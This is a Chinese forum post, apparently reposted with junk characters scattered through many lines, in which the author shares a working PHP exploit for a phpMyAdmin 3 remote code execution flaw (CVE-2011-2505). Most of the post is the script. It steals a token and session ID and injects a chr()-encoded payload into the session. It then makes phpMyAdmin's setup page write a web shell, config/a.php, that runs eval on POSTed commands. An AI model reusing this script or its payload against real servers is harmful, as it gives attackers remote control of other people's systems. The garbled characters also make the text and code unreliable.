最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
0 _5 |5 W1 j3 V" |" ?0 g7 [& Z9 A, M2 B. x+ \) w* N4 i
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
5 ?- R Y7 {; |" j; N
1 A1 T% u* X+ ` {8 ^+ a% X# k首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
2 \8 d0 B4 P! E$ a/ M/ o一是session.auto_start = 1;
% a& z U9 O4 |二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
# g" }& d9 z! [$ P6 I4 j" l. P2 I当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。" r3 }0 d- P9 j# ?
8 c: y) ]4 z3 s9 H5 f3 d
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。! Q) \& c3 ~) E& }2 d- Y8 v
; R& O1 m# \2 l9 K+ T$ ?" s4 ~: H于是写了这个php版本的exp,代码如下:
+ S t0 A' T8 O6 w6 B, p/ t) F0 X9 K
#!/usr/bin/php" \6 D% o2 d$ B. t7 J/ J+ V
<?php2 m P3 x `4 Z
print_r('2 ?0 k; R, B8 h6 v: c! b6 c* G
+---------------------------------------------------------------------------+4 U2 ?& x7 D) ?2 u) ~
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
+ j1 l1 G( q' Z- ]4 I7 aby oldjun(www.oldjun.com)
; `& b; `7 ]. E2 a% X. z0 _$ Jwelcome to www.t00ls.net4 R6 F" w1 f% Z* H" D: p+ O
mail: oldjun@gmail.com+ J* k; _. y0 u3 ~9 ]
Assigned CVE id: CVE-2011-2505
1 S7 l$ s; Q5 ~7 U$ ~3 {& X7 j+---------------------------------------------------------------------------+
* b" \5 K9 Y) X1 a/ j');' E* N( d# a$ p6 U1 f+ ^
. h5 v# w& X2 [& O1 L0 k* j
/**4 ^$ z& j6 C& J7 P3 d0 {) J
* working when the directory:"config" exists and is writeable.2 g6 s1 U3 U4 k, m( ?$ X& T, r
**/# v+ ]) J1 }7 v
6 a" k T6 g/ E3 s
if ($argc < 3) {
8 P7 c7 |' A/ R6 X* y2 c print_r('2 Y2 ]* y* m/ g D7 E$ Y
+---------------------------------------------------------------------------+: o: b1 K o7 j
Usage: php '.$argv[0].' host path
; _1 a7 q+ B1 [# R) K* E9 _; |host: target server (ip/hostname)
' H+ ~( O' r- Y9 `, I) K$ `; lpath: path to pma3. K: p) `+ \+ }% C+ v- l% B+ X
Example:
; c1 G2 e+ I6 H* l& Jphp '.$argv[0].' localhost /pma/1 z4 O& T2 ]- n2 t, e
+---------------------------------------------------------------------------+: Q# ]" p' x3 u1 G, n
'); i8 g2 D$ C1 [. d2 [' ]$ |9 H
exit;' d( E+ F5 J2 n0 z, a* f1 y
}
5 y# G' B: T- T: V8 X4 r4 {- R9 W& ^, S1 K
$host = $argv[1];8 d9 D0 `" U9 V% ]& I
$path = $argv[2];
) B# z b' Q6 F e$ M+ d( S; h" L
/**+ L# n/ [1 M$ | g* s) f, u
* Try to determine if the directory:"config" exists; M8 S0 E5 G. c" @9 M" Z* A) [3 _3 D
**/
9 T7 D! ~$ `; U# Lecho "[+] Try to determine if the directory:config exists....\n";! I9 N. ?2 I" c; r" H& W
$returnstr=php_request('config/');% z5 s- T+ o5 P$ d. ~0 ^
if(strpos($returnstr,'404')){
1 [9 M8 b3 h4 S6 s7 U" q2 x( Z, l exit("[-] Exploit Failed! The directory:config do not exists!\n"); F' e4 E& @3 j8 W3 o
}6 M" D9 ~# U) J1 t! M
, {9 S- z6 u8 p, ~/**; ~! F+ X6 a$ D# r
* Try to get token and sessionid5 O# h8 G5 W4 h
**/% ]0 J" M. b( o' q
echo "[+] Try to get token and sessionid....\n";; \6 T* L" Z8 }! ~7 y+ r
$result=php_request('index.php');( R7 a. z; [, i5 H
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);# _; Q% r1 }$ U: s
$token=$resp[3];" x# n: \" Z2 | ?, X8 C! M
$sessionid=$resp[1];
4 k) v& e) Y( b/ U# F0 u2 Oif($token && $sessionid){5 ^$ x1 y* r# Z8 f+ Z8 [9 i( V
echo "[+] token token\n";" }+ |+ E9 B# O' F1 c# T
echo "[+] Session IDsessionid\n";
' z( B" F, e5 } ]4 {# j}else{ d5 U# n1 n6 L% O5 p& Y; q
exit("[-] Can't get token and Session ID,Exploit Failed!\n");. h( Y% x! N6 |/ V6 o" v3 a$ B* R
}
; j; `0 ]6 \: O- [9 O" S3 m4 o
& M! B( B' I* D0 d1 x/**6 m1 | @/ H# f8 ~/ O
* Try to insert shell into session
1 M( J* I; Q+ l! j- g" H**/- b" |# \6 |% A; c. _) @! m" D
echo "[+] Try to insert shell into session....\n";
# a9 v! T" x' ^2 C- _/ U& l' h0 _php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.. X4 g1 J: N0 Z! l f6 A
* Q' ^% Y* t. u5 C u' t/**3 C& B# U' r9 d- V% K. G0 m+ Z4 S
* Try to create webshell
( t# w# u+ }; p" Y {; O**/
; b$ J2 r8 i8 H) necho "[+] Try to create webshell....\n";* S) p! j u( T
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
1 _" a4 w& _+ J( d! S9 n: d/**+ h7 f6 c+ o' O: k
* Try to check if the webshell was created successfully) Z5 n, k* y. m( Q2 K- D* H$ W
**/3 J0 z7 i0 H0 Q3 s/ L- y5 p
echo "[+] Try to check if the webshell was created successfully....\n";
! x0 Y, S* p3 t D- l$content=php_request('config/config.inc.php');
8 \" v; V0 e, ]3 Mif(strpos($content,'t00ls')){
& ?- {$ H, S, m# r X echo "[+] Congratulations! Expoilt successfully....\n";: [* o. @* L' `, q0 `' B4 t3 M
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
! Z% c7 T5 V+ \3 k2 j2 w y) K}else{6 A7 U* Y% I Q
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");0 z+ N! _* G% [, W
}
2 L: V+ u! x+ \! V) A8 F8 M9 t0 n5 w
function php_request($url,$data='',$cookie=''){
5 a+ k; w8 S6 _5 O- w$ Y1 i global $host, $path;
- o+ k5 L7 B0 B0 z9 g/ ]3 ?
: g" M; G N( H! L! a $method=$data?'POST':'GET';
, P9 G. i- J8 n : N6 A# Q% J! I
$packet = $method." ".$path.$url." HTTP/1.1\r\n";& |4 [, p7 i% z( z/ d
$packet .= "Accept: */*\r\n";. I" `, B, p" K) G$ T5 N6 H- [- \; M0 I
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
1 L" t+ T: \/ I" b7 [ w! l $packet .= "Host: $host\r\n";/ L/ I5 E) p" X: \! u
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
( \& g# Q6 V9 K$ E$ { $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";3 ]7 B( e* F( `4 C r
$packet .= $cookie?"Cookie: $cookie\r\n":"";+ a0 L2 e; \! s* Z* e1 u
$packet .= "Connection: Close\r\n\r\n";/ p$ R7 V5 B/ r/ H) E8 ~
$packet .= $data?$data:"";
# O8 F$ U0 `- F h$ h7 q+ _9 p4 N4 z5 S; ]) B6 U6 J4 N
$fp = fsockopen(gethostbyname($host), 80);- T( W7 S- r7 r; ~& y" A
if (!$fp) {
! f6 o7 v5 T4 X, ] echo 'No response from '.$host; die;4 W0 r" o. H* \( U. h# H( A
}
2 m4 m# ?1 B3 o; D fputs($fp, $packet);
, [4 p* E+ t4 P/ b
$ ~5 K6 q$ U/ D' m# ^; ` $resp = '';
( O/ F$ E- o! ^$ `' U: d6 F( }7 M7 W/ W, D: L
while ($fp && !feof($fp))
7 G* @9 ?& u: p- S) H ]0 o w $resp .= fread($fp, 1024);
; o, d% f; }/ k& f0 _ }1 U' d
) {0 M/ k1 `1 o/ ] return $resp;. T0 ~3 R, l% i* a
}2 e+ Z8 d" t$ v- @5 Q$ _# {
; H D( I5 D0 G) \( O; `
?>
2 x3 k0 V+ M$ y. |
发表于 2013-2-21 09:13:03
收藏
支持
反对